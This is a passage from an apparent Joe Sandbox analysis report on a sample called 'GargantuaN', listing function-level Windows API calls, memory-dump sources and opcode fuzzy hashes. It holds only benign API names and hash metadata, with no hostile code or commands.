                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: 37aa7196f2ad1a5ba2d2a5374b9ee5d1fb66fea755e9d83f4b0e56e7eb5ada18
                                                        • Instruction ID: f4c9118f0d2238143ebc926a61a17b6af17336b7e25c4c326c589d3152848337
                                                        • Opcode Fuzzy Hash: 37aa7196f2ad1a5ba2d2a5374b9ee5d1fb66fea755e9d83f4b0e56e7eb5ada18
                                                        • Instruction Fuzzy Hash: C011C231601700EBDB24C628C856BAAF7E9AB45362F644A29FD53D26D0D7B0ED4DC770
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _free.LIBCMT ref: 00D78E75
                                                          • Part of subcall function 00D78E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7CA2C,00000000,?,00D76CBE,?,00000008,?,00D791E0,?,?,?), ref: 00D78E38
                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00D91098,00D517CE,?,?,00000007,?,?,?,00D513D6,?,00000000), ref: 00D78EB1
                                                        Similarity
                                                        • API ID: Heap$AllocAllocate_free
                                                        • String ID:
                                                        • API String ID: 2447670028-0
                                                        • Opcode ID: 82ed6a265d47e30eb230fa5133e39cea01f945809dd0c6e41420b083df676756
                                                        • Instruction ID: 9256cb8021f0a4b34e557f75aceb77f91ed9ad0daba2687b85af482f34489c89
                                                        • Opcode Fuzzy Hash: 82ed6a265d47e30eb230fa5133e39cea01f945809dd0c6e41420b083df676756
                                                        • Instruction Fuzzy Hash: F8F09632681215AADB212A259C0DB6F7758CF91B70F68D126F86CAA191FF72DD00B1B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 00D610AB
                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D610B2
                                                        Similarity
                                                        • API ID: Process$AffinityCurrentMask
                                                        • String ID:
                                                        • API String ID: 1231390398-0
                                                        • Opcode ID: 08292bcad211cc9a586062cf0c8d12afed2dbcb29d46074821ed5a3b47b5b776
                                                        • Instruction ID: ee9df6a5b61d4eeb47e3b9d2b3619533bee91f5f937a1147dd79400ac77c103d
                                                        • Opcode Fuzzy Hash: 08292bcad211cc9a586062cf0c8d12afed2dbcb29d46074821ed5a3b47b5b776
                                                        • Instruction Fuzzy Hash: 08E0DF3AF10249A7CF098BB89C058EB73EDEA4420432C8179E403E3241FA30EE424BB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A501
                                                          • Part of subcall function 00D5BB03: _wcslen.LIBCMT ref: 00D5BB27
                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A532
                                                        Similarity
                                                        • API ID: AttributesFile$_wcslen
                                                        • String ID:
                                                        • API String ID: 2673547680-0
                                                        • Opcode ID: 2147c2512a632caf3a2e4973b2679c27e0ccde624a8b7f4dfed086eb35c30563
                                                        • Instruction ID: 79077a60f6251482c8bb05f0fd4f16f7daa2f958c357b5cc855fe078ba02c48e
                                                        • Opcode Fuzzy Hash: 2147c2512a632caf3a2e4973b2679c27e0ccde624a8b7f4dfed086eb35c30563
                                                        • Instruction Fuzzy Hash: 8BF03932250219BBDF015F64DC45FDE376CAB04786F488462BD49E6260EB71DA98EB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DeleteFileW.KERNELBASE(000000FF,?,?,00D5977F,?,?,00D595CF,?,?,?,?,?,00D82641,000000FF), ref: 00D5A1F1
                                                          • Part of subcall function 00D5BB03: _wcslen.LIBCMT ref: 00D5BB27
                                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00D5977F,?,?,00D595CF,?,?,?,?,?,00D82641), ref: 00D5A21F
                                                        Similarity
                                                        • API ID: DeleteFile$_wcslen
                                                        • String ID:
                                                        • API String ID: 2643169976-0
                                                        • Opcode ID: a54fc7e70cacec6663d2c92de34bcafe50687a6ae05e07acd7512cbd2d6578f7
                                                        • Instruction ID: 92e610284b769288e298b89f30794839b5873336b8f033c02230e15cf90d026c
                                                        • Opcode Fuzzy Hash: a54fc7e70cacec6663d2c92de34bcafe50687a6ae05e07acd7512cbd2d6578f7
                                                        • Instruction Fuzzy Hash: F7E092351502196BDF019F64EC46FD9375CAF08787F484021BD48D2150EB61DE98EB74
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00D82641,000000FF), ref: 00D6ACB0
                                                        • OleUninitialize.OLE32(?,?,?,?,00D82641,000000FF), ref: 00D6ACB5
                                                        Similarity
                                                        • API ID: GdiplusShutdownUninitialize
                                                        • String ID:
                                                        • API String ID: 3856339756-0
                                                        • Opcode ID: 9b397629d2386404bb2d662cb563c25bd946192f273be1c4719137cb61434f92
                                                        • Instruction ID: ea404bcac40fc5ece7bbd9baf9dac85acdc4b86ffa31e38f26d5c47b94d2de2c
                                                        • Opcode Fuzzy Hash: 9b397629d2386404bb2d662cb563c25bd946192f273be1c4719137cb61434f92
                                                        • Instruction Fuzzy Hash: 27E03972604650EFCA01AB5CDC06B49FBA9FB88B20F00426AA416D37A0CB74A800CAA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00D5A23A,?,00D5755C,?,?,?,?), ref: 00D5A254
                                                          • Part of subcall function 00D5BB03: _wcslen.LIBCMT ref: 00D5BB27
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D5A23A,?,00D5755C,?,?,?,?), ref: 00D5A280
                                                        Similarity
                                                        • API ID: AttributesFile$_wcslen
                                                        • String ID:
                                                        • API String ID: 2673547680-0
                                                        • Opcode ID: 110860b966effc5b5aa632c38b3e84d3e9c4128abb564195215ca4e1cb5110c7
                                                        • Instruction ID: 97533008747123d4941170d883b9eecf8dbf80c0a7ee271213ed85883ab72fdb
                                                        • Opcode Fuzzy Hash: 110860b966effc5b5aa632c38b3e84d3e9c4128abb564195215ca4e1cb5110c7
                                                        • Instruction Fuzzy Hash: 7AE06D355002285BCF10AB68CC05BDD7B58AB087E2F044261BD48E7290D6709E488AB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _swprintf.LIBCMT ref: 00D6DEEC
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        • SetDlgItemTextW.USER32(00000065,?), ref: 00D6DF03
                                                          • Part of subcall function 00D6B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6B579
                                                          • Part of subcall function 00D6B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6B58A
                                                          • Part of subcall function 00D6B568: IsDialogMessageW.USER32(0002047E,?), ref: 00D6B59E
                                                          • Part of subcall function 00D6B568: TranslateMessage.USER32(?), ref: 00D6B5AC
                                                          • Part of subcall function 00D6B568: DispatchMessageW.USER32(?), ref: 00D6B5B6
                                                        Similarity
                                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                        • String ID:
                                                        • API String ID: 2718869927-0
                                                        • Opcode ID: f50249bf15cb46935f078ee367cc422a8f6cd0359799932e525bc34a208b6fee
                                                        • Instruction ID: 85d80a92d09fb9c05f13ade361584e4dfbb7ad4cf5e1e00bc8ee7a5979d72210
                                                        • Opcode Fuzzy Hash: f50249bf15cb46935f078ee367cc422a8f6cd0359799932e525bc34a208b6fee
                                                        • Instruction Fuzzy Hash: 4DE09B7640434866DF01A764DC06FDE376C9F057C5F040852B601D71B2E974D6549772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D60836
                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5F2D8,Crypt32.dll,00000000,00D5F35C,?,?,00D5F33E,?,?,?), ref: 00D60858
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystem
                                                        • String ID:
                                                        • API String ID: 1175261203-0
                                                        • Opcode ID: 18d246545349eb22e91999c5f1c0dfb2621323f491da9bbda120b69436e66360
                                                        • Instruction ID: be3b566de8527d9b4a567871b241fd377a429d172d841c0151724b33341bfca9
                                                        • Opcode Fuzzy Hash: 18d246545349eb22e91999c5f1c0dfb2621323f491da9bbda120b69436e66360
                                                        • Instruction Fuzzy Hash: 07E048764102586BDF11AB94DC05FDB7BACEF097D1F0400657A49D2104E674DA84CBF0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D6A3DA
                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D6A3E1
                                                        Similarity
                                                        • API ID: BitmapCreateFromGdipStream
                                                        • String ID:
                                                        • API String ID: 1918208029-0
                                                        • Opcode ID: 511e6508b725c6d1a18de41e92d339a27222214aae5a383e1810fcf25d2a22c2
                                                        • Instruction ID: 0eb1ed956be79c1796a53e867dcd853877df6f190c772edf370c1087ee7a2906
                                                        • Opcode Fuzzy Hash: 511e6508b725c6d1a18de41e92d339a27222214aae5a383e1810fcf25d2a22c2
                                                        • Instruction Fuzzy Hash: 3DE0ED75500218EFCB10DF99C941A99BBE8EB04360F10805AA896A3301E374AE04DFB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D72BAA
                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D72BB5
                                                        Similarity
                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                        • String ID:
                                                        • API String ID: 1660781231-0
                                                        • Opcode ID: 6a80a5bfeb9645aebd49213c2178108b4e1c30d7fe7483431d6ac10bbbd71d7c
                                                        • Instruction ID: 2aee778a7928ed357a8b19036a50221b43712ec5c3dca2d8864c901b6ee09b20
                                                        • Opcode Fuzzy Hash: 6a80a5bfeb9645aebd49213c2178108b4e1c30d7fe7483431d6ac10bbbd71d7c
                                                        • Instruction Fuzzy Hash: 34D022352643801C4E243E702C034BA3355EE82B707F0D29AF02CC58CDFF109048B231
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: ItemShowWindow
                                                        • String ID:
                                                        • API String ID: 3351165006-0
                                                        • Opcode ID: 346871765eba561b0b35491958c567a75de567813b69ff3544ab1f6e452691fd
                                                        • Instruction ID: d5a71f7236fc0d42c94448f3764ebce5c16913b3b5162a563d4055e2f6c8e4b0
                                                        • Opcode Fuzzy Hash: 346871765eba561b0b35491958c567a75de567813b69ff3544ab1f6e452691fd
                                                        • Instruction Fuzzy Hash: 4EC0123205C300FECB010BB8DC09C2FBBACABA5312F04CA08F0A5C0260C238C120EB21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 0a20f87e75dfe1ec8a2e462fd64e32c1dc24c30807ecdd2eeca817844c060751
• Instruction ID: 6df20726383d46db5681b45730b934f1553485ed936ca48543a88a6041bc9200
• Opcode Fuzzy Hash: 0a20f87e75dfe1ec8a2e462fd64e32c1dc24c30807ecdd2eeca817844c060751
• Instruction Fuzzy Hash: D9C1B078A00254AFEF15CF68C484BB97BA5EF16311F0801BAEC45DB392DB319948CB71
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 5d3cb039f86c86fd4c2be105b00e086f147b0d288c32fadbcad03408e71a996d
• Instruction ID: 380cc4f6a303a39081de2e0249b26732b00b149193eae3c441bec208019e1bf0
• Opcode Fuzzy Hash: 5d3cb039f86c86fd4c2be105b00e086f147b0d288c32fadbcad03408e71a996d
• Instruction Fuzzy Hash: 9F71A071500B449EDF25DB74C8519EBB7E9EB14342F44092EFDAB87241EA326688DF31
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00D58289
  • Part of subcall function 00D513DC: __EH_prolog.LIBCMT ref: 00D513E1
  • Part of subcall function 00D5A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D5A598
Memory Dump Source
• Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
Similarity
• API ID: H_prolog$CloseFind
• String ID:
• API String ID: 2506663941-0
• Opcode ID: a3584f1164082747d3743392f804fb654745f6538ef21d542c4848a6a68e1411
• Instruction ID: 9a74a88439fb4d27a6a72535dae2cb76336cc4865c3576209ce692dffc80069f
• Opcode Fuzzy Hash: a3584f1164082747d3743392f804fb654745f6538ef21d542c4848a6a68e1411
• Instruction Fuzzy Hash: D341A7759446589ADF20DB60CC55BEAB778EF00305F4404EAEC8AA7092EB755ECCDB70
Uniqueness
• Uniqueness Score: -1.00%


                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D513E1
                                                          • Part of subcall function 00D55E37: __EH_prolog.LIBCMT ref: 00D55E3C
                                                          • Part of subcall function 00D5CE40: __EH_prolog.LIBCMT ref: 00D5CE45
                                                          • Part of subcall function 00D5B505: __EH_prolog.LIBCMT ref: 00D5B50A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: a6cf97421971a09143ab13f6bdfde2d4655bfdada2b0bf7717af9df77494371b
                                                        • Instruction ID: 302bd61277719c15d411e8fb8981ffc21578c744d9507716202dab4874691fb2
                                                        • Opcode Fuzzy Hash: a6cf97421971a09143ab13f6bdfde2d4655bfdada2b0bf7717af9df77494371b
                                                        • Instruction Fuzzy Hash: 7B413EB0905B409ED724DF798885AE6FBE5FF19310F504A2ED9FE83242DB716658CB20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D513E1
                                                          • Part of subcall function 00D55E37: __EH_prolog.LIBCMT ref: 00D55E3C
                                                          • Part of subcall function 00D5CE40: __EH_prolog.LIBCMT ref: 00D5CE45
                                                          • Part of subcall function 00D5B505: __EH_prolog.LIBCMT ref: 00D5B50A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 07595720aa5a60b46ba778a3cd34b7dfa0dc0d51bda77277bd14dd731e605d3a
                                                        • Instruction ID: b0f8317f9b85c481786ebe6b51ae3e056f6cd81575a54ded8fdd1ef6e35f8d1f
                                                        • Opcode Fuzzy Hash: 07595720aa5a60b46ba778a3cd34b7dfa0dc0d51bda77277bd14dd731e605d3a
                                                        • Instruction Fuzzy Hash: 77413EB0905B409ED724DF798885AE6FBE5FF19310F50492ED9FE83241DB716654CB20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D6B098
                                                          • Part of subcall function 00D513DC: __EH_prolog.LIBCMT ref: 00D513E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: c60cb7c5de35ccd60f0ce8ad9691fb90fa0ca5e0edd9dc542cb7b64e774d005b
                                                        • Instruction ID: de38c0356202a30e6a8a2443432d65e20e2139f8a4f3afa087eadb766f0b3c71
                                                        • Opcode Fuzzy Hash: c60cb7c5de35ccd60f0ce8ad9691fb90fa0ca5e0edd9dc542cb7b64e774d005b
                                                        • Instruction Fuzzy Hash: 8F314D75804249AFCF15DF64C951AEEBBB4EF05314F14449EE809B7242D739AE48CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00D7ACF8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID:
                                                        • API String ID: 190572456-0
                                                        • Opcode ID: 4dd38f5b6d0dd563fbabf19d8d55219be27e683e91052c9c11aed90fa1259cfd
                                                        • Instruction ID: 7eebcedf8268d398af6d331af8829aa7098113b3614e4ce299f1395ab2b0dafd
                                                        • Opcode Fuzzy Hash: 4dd38f5b6d0dd563fbabf19d8d55219be27e683e91052c9c11aed90fa1259cfd
                                                        • Instruction Fuzzy Hash: 2011E737A00225AF9B329E1DDC5089E7395EBC432071AC220EC59EB354F630DC018BF2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 26c571a90e210984256b7a7d26f1a3d4ff4c558796dda180342c1003bffce405
                                                        • Instruction ID: e90bcc2b504dedab6feacd55104bc26a6bbf8e9c292cecccc77dc8bef8cae7d4
                                                        • Opcode Fuzzy Hash: 26c571a90e210984256b7a7d26f1a3d4ff4c558796dda180342c1003bffce405
                                                        • Instruction Fuzzy Hash: 0D015277900528EBCF21ABA8CD919DEB776EF88751F054515EC16BB252DA348D0886B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D7B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D79813,00000001,00000364,?,00D73F73,00000050,?,00D91030,00000200), ref: 00D7B177
                                                        • _free.LIBCMT ref: 00D7C4E5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                        • Instruction ID: c0b57b45989b2208db419dbf3f00470da841d5207bd97de2b1d43c517caf0f12
                                                        • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                        • Instruction Fuzzy Hash: B901D6722103056FE3318E699885A6AFBE9EB85374F65451EE59883281FA30A905C774
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D79813,00000001,00000364,?,00D73F73,00000050,?,00D91030,00000200), ref: 00D7B177
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 23e5f5d9e1dd439aab6a42273a6a0488803b6313820198d3e18692a23ded228b
                                                        • Instruction ID: dab26534d5681d0bd8b452527228ebf8ca4f34151af2d67937f6e3c18894990f
                                                        • Opcode Fuzzy Hash: 23e5f5d9e1dd439aab6a42273a6a0488803b6313820198d3e18692a23ded228b
                                                        • Instruction Fuzzy Hash: 3BF05432545725ABDB215B25AC2AB5E7748EF41770B9CC213FC0CDB190FB21D90186F0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00D73C3F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
